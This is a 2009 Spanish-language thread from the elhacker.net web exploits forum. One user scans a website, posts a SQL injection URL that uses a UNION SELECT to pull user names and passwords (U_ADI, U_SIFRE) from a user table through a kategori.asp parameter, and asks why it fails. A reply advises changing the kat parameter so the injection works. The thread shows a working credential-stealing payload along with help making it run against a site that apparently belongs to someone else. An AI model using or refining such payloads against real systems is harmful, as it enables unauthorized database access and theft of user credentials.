elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  inyeccion SQL		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: inyeccion SQL  (Leído 2,692 veces)
tukuyu

Desconectado Desconectado

Mensajes: 12


Ver Perfil
inyeccion SQL
« en: 20 Septiembre 2009, 13:22 pm »
 wenas escanee una web con sss busque el exploit de esa vulnerabilidad y me salio este:
http://www.example.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201

lo e copiado en la url  desde /kategori y me salta(Critical error occurred: Unable to find the requested module in our database)  aver si alguien me exa una mano gracias

salu2
« Última modificación: 20 Septiembre 2009, 14:15 pm por tukuyu » En línea
emma93

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: inyeccion SQL
« Respuesta #1 en: 1 Octubre 2009, 05:14 am »
El error dice que no se ha podido encontrar el módulo en la base de datos.

Fijate la variable kat, buscá una variable que exista en el archivo ASP, y de ahi copiá todo para delante a ver si te sirve.

Saludos !
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines